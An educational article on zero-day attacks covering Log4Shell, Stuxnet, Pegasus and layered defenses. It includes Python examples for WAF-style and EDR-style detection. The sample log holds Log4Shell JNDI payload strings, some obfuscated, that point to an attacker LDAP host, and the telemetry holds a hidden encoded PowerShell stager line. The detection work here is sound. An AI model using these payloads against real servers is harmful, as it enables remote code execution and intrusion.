Zero-Day Attack

What Is a Zero-Day Attack

A zero-day attack exploits a software vulnerability during the window between its discovery and the release of a patch (fix) by the developer; the name comes from the developer having had "zero days" to prepare a defense. Since no patch exists, defenses that depend on patching (vulnerability scanning, update management) cannot stop it.

Zero-day vulnerabilities are traded on the gray and black markets for high prices; a zero-click remote code execution chain against iOS can fetch millions of dollars. Nation-state actors and advanced persistent threat (APT) groups stockpile zero-day exploits for intelligence operations and cyberwarfare.

The Zero-Day Attack Lifecycle

  1. Vulnerability Discovery: An attacker (or security researcher) discovers an unknown vulnerability in software.
  2. Exploit Development: Code that exploits the vulnerability (an exploit) is created.
  3. Attack Execution: The exploit is used against the target. At this point no patch exists, and signature-based antivirus has no pattern to match, so neither layer sees the attack.
  4. Vulnerability Disclosure: The vulnerability is reported to the developer or publicly disclosed. The developer begins working on a patch.
  5. Patch Release: The developer releases a fix. Systems that apply the patch are protected, but unpatched systems remain vulnerable, and the patch itself now tells other attackers where the flaw is.

The critical danger period runs from step 3 to step 5, and for any individual system until the patch is actually applied. The longer this window, the greater the damage. Coordinated (responsible) disclosure aims to shrink it by giving the developer time to prepare a patch before the details become public, so that a fix is available the moment the vulnerability is announced.

Real-World Cases

  • Log4Shell (2021): A vulnerability in the Java logging library Log4j (CVE-2021-44228) that allowed remote code execution through a crafted lookup string in any logged input. It affected an enormous number of Java applications and services worldwide, and mass exploitation attempts began within hours of public disclosure. The depth of software supply chain dependencies, with Log4j pulled in transitively by countless projects that never reference it directly, amplified the damage and made even finding affected systems difficult.
  • Stuxnet (2010): Malware that exploited four Windows zero-day vulnerabilities and manipulated Siemens industrial controllers to sabotage centrifuges at Iran's Natanz uranium enrichment facility. Widely attributed to a joint US-Israeli operation, it demonstrated that cyberattacks could cause physical destruction of infrastructure.
  • Pegasus (NSO Group): Spyware that exploited iOS and Android zero-day vulnerabilities to infect smartphones without any user interaction (zero-click). Its use for surveillance of journalists and human rights activists raised serious human rights concerns.

Defense Strategies Against Zero-Day Attacks

Against attacks where no patch exists, a defense-in-depth approach is essential.

  • WAF Deployment: Web Application Firewalls can block not only known attack patterns but also anomalous request patterns, and so mitigate some zero-day attacks against web applications. They are a stopgap rather than a fix: only traffic that passes through the WAF is inspected, and attackers quickly obfuscate payloads to slip past pattern rules, as happened with Log4Shell within days of the first rule updates.
  • EDR (Endpoint Detection and Response): Unlike traditional antivirus that relies on signatures, EDR detects suspicious behavior (unusual process execution, mass file access) and can automatically isolate affected endpoints.
  • Network Segmentation: Dividing the network into segments limits the blast radius even if one segment is compromised. Isolating critical systems is especially important.
  • Principle of Least Privilege: Granting users and applications only the minimum necessary permissions limits the damage an attacker can do even after exploiting a vulnerability.
  • Threat Intelligence: Subscribing to threat intelligence feeds to stay informed about newly discovered vulnerabilities and attack trends enables proactive defense measures.
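To make the WAF point concrete, here is an added example (not code from the original page or from any WAF product) that scans constructed access-log lines for Log4Shell-style JNDI lookup strings. A naive signature matches only the literal `${jndi:` form; the second check first emulates the handful of Log4j lookup types that attackers used to obfuscate payloads (`${lower:j}`, `${::-j}`, `${env:NaN:-j}`) and then applies the same signature. The log lines, IP addresses and the `normalize`/`scan` helper names are constructed for illustration.

```python
import re
from typing import List, Optional, Tuple

# Innermost Log4j-style lookup: ${...} whose body contains no nested ${ or }.
INNER = re.compile(r"\$\{([^${}]*)\}")
# The signature a naive WAF rule would carry for CVE-2021-44228.
NAIVE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def resolve_inner(body: str) -> Optional[str]:
    """Approximate how Log4j 2 evaluates one innermost ${...} lookup.

    Returns None for a jndi: lookup, which is the sink we want to keep
    visible rather than rewrite. Only a few lookup types are emulated
    (assumption: enough to cover the common obfuscation tricks).
    """
    low = body.lower()
    if low.startswith("jndi:"):
        return None
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default}: an unresolvable key such as env:NaN, sys:x or the
        # empty key in ${::-j} evaluates to its attacker-chosen default.
        return body.split(":-", 1)[1]
    # Any other lookup (date:, ctx:, ...) is unwrapped so the loop terminates;
    # its text stays in the output for a human to inspect.
    return body


def normalize(s: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups inside-out until only jndi: lookups remain."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            resolved = resolve_inner(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        s = INNER.sub(repl, s)
        if not changed:
            break
    return s


# Constructed Apache-style access log: one benign request, four Log4Shell
# probes in the User-Agent (the last three obfuscated), and one benign request
# that happens to carry a harmless lookup in its query string.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.9 - - [10/Dec/2021:03:15:31 +0000] "GET /login HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:ldap}://203.0.113.9:1389/a}"
203.0.113.9 - - [10/Dec/2021:03:16:02 +0000] "GET /login HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9:1389/a}"
203.0.113.9 - - [10/Dec/2021:03:16:40 +0000] "GET /login HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi${env:NaN:-:}ldap://203.0.113.9:1389/a}"
198.51.100.7 - - [10/Dec/2021:03:17:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"
"""


def scan(log: str) -> Tuple[List[int], List[int]]:
    """Return (lines flagged by the naive rule, lines flagged after normalization)."""
    naive_hits, normalized_hits = [], []
    for lineno, line in enumerate(log.splitlines(), start=1):
        if NAIVE.search(line):
            naive_hits.append(lineno)
        if NAIVE.search(normalize(line)):
            normalized_hits.append(lineno)
    return naive_hits, normalized_hits


if __name__ == "__main__":
    naive, normalized = scan(SAMPLE_LOG)
    print("naive signature flagged lines:", naive)
    print("after lookup normalization:   ", normalized)
```

Run it and the naive rule flags only line 2, while the normalized check flags lines 2 through 5; the last line, a benign `${date:yyyy}` lookup, stays clean in both. This is the shape of the rule updates WAF vendors shipped after Log4Shell, and also why a pattern rule is never a complete defense on its own: the emulation above covers four lookup types, and Log4j supports more.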

To learn more about this topic, see Supply Chain Attacks: The New Threat Exploiting Trust.

Common Misconceptions

Zero-day attacks are irrelevant to ordinary users
When zero-day vulnerabilities exist in browsers or operating systems, regular users are also affected. Vulnerabilities in widely used libraries like Log4Shell can indirectly impact users through the services they use.
Antivirus software can prevent zero-day attacks
Traditional antivirus software detects threats based on signatures (patterns of known malware) and therefore cannot recognize an attack it has never seen. EDR with behavioral detection and sandboxing catches many zero-day attacks by what they do rather than what they are, but no single tool blocks all of them, which is why the defense-in-depth measures above matter.
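As an added illustration of this difference (example code, not from the original page or any EDR vendor), the following Python compares a hash-based signature check with two behavioral rules over constructed process-creation events. The event records, hashes, rule names and the `signature_hits`/`behavioral_hits` functions are all assumptions made for the example.

```python
import hashlib
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record, the kind of telemetry an EDR sensor collects."""
    parent: str   # image name of the parent process
    image: str    # image name of the newly created process
    cmdline: str  # full command line
    sha256: str   # hash of the executable on disk


def fake_hash(label: str) -> str:
    # Constructed stand-in for a real file hash (hypothetical values).
    return hashlib.sha256(label.encode()).hexdigest()


# Signature database: hashes of malware seen before. A fresh zero-day dropper is
# by definition absent, and a signed system binary like powershell.exe never
# belongs here, yet it is exactly what post-exploitation payloads run.
KNOWN_BAD_HASHES = {fake_hash("previously-seen-trojan.exe")}

# Constructed telemetry (hypothetical): a user opens a booby-trapped document that
# launches a hidden, base64-encoded PowerShell stager; an admin runs a backup script.
EVENTS = [
    ProcessEvent("explorer.exe", "winword.exe", 'winword.exe "invoice.docx"', fake_hash("winword.exe")),
    ProcessEvent("winword.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
                 fake_hash("powershell.exe")),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe -File C:\\ops\\backup.ps1",
                 fake_hash("powershell.exe")),
    ProcessEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs", fake_hash("svchost.exe")),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)
HIDDEN_FLAG = re.compile(r"(^|\s)-w(indowstyle)?\s+hidden", re.IGNORECASE)


def signature_hits(events: List[ProcessEvent]) -> List[int]:
    """Classic antivirus logic: flag only executables whose hash is already known bad."""
    return [i for i, e in enumerate(events) if e.sha256 in KNOWN_BAD_HASHES]


def behavioral_hits(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """EDR-style rules keyed on what a process does, not on which binary it is."""
    alerts: List[Tuple[int, str]] = []
    for i, e in enumerate(events):
        parent, image = e.parent.lower(), e.image.lower()
        # An Office application should never need to spawn a shell or script host.
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            alerts.append((i, "office-app-spawned-script-host"))
        # A hidden window plus an encoded command is the typical shape of a stager,
        # regardless of what the decoded script eventually does.
        if image in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAG.search(e.cmdline) \
                and HIDDEN_FLAG.search(e.cmdline):
            alerts.append((i, "hidden-encoded-powershell"))
    return alerts


if __name__ == "__main__":
    print("signature hits:", signature_hits(EVENTS))
    for idx, rule in behavioral_hits(EVENTS):
        e = EVENTS[idx]
        print(f"behavioral hit [{rule}]: {e.parent} -> {e.image}: {e.cmdline}")
```

The two powershell.exe events carry the same hash because they are the same signed Microsoft binary; a hash lookup has no way to tell the malicious launch from the admin's backup script, while the parent-child and command-line rules separate them cleanly. Real EDR products carry many more such rules plus sandbox detonation of unknown files, and tune them against the organization's own baseline to keep false positives down.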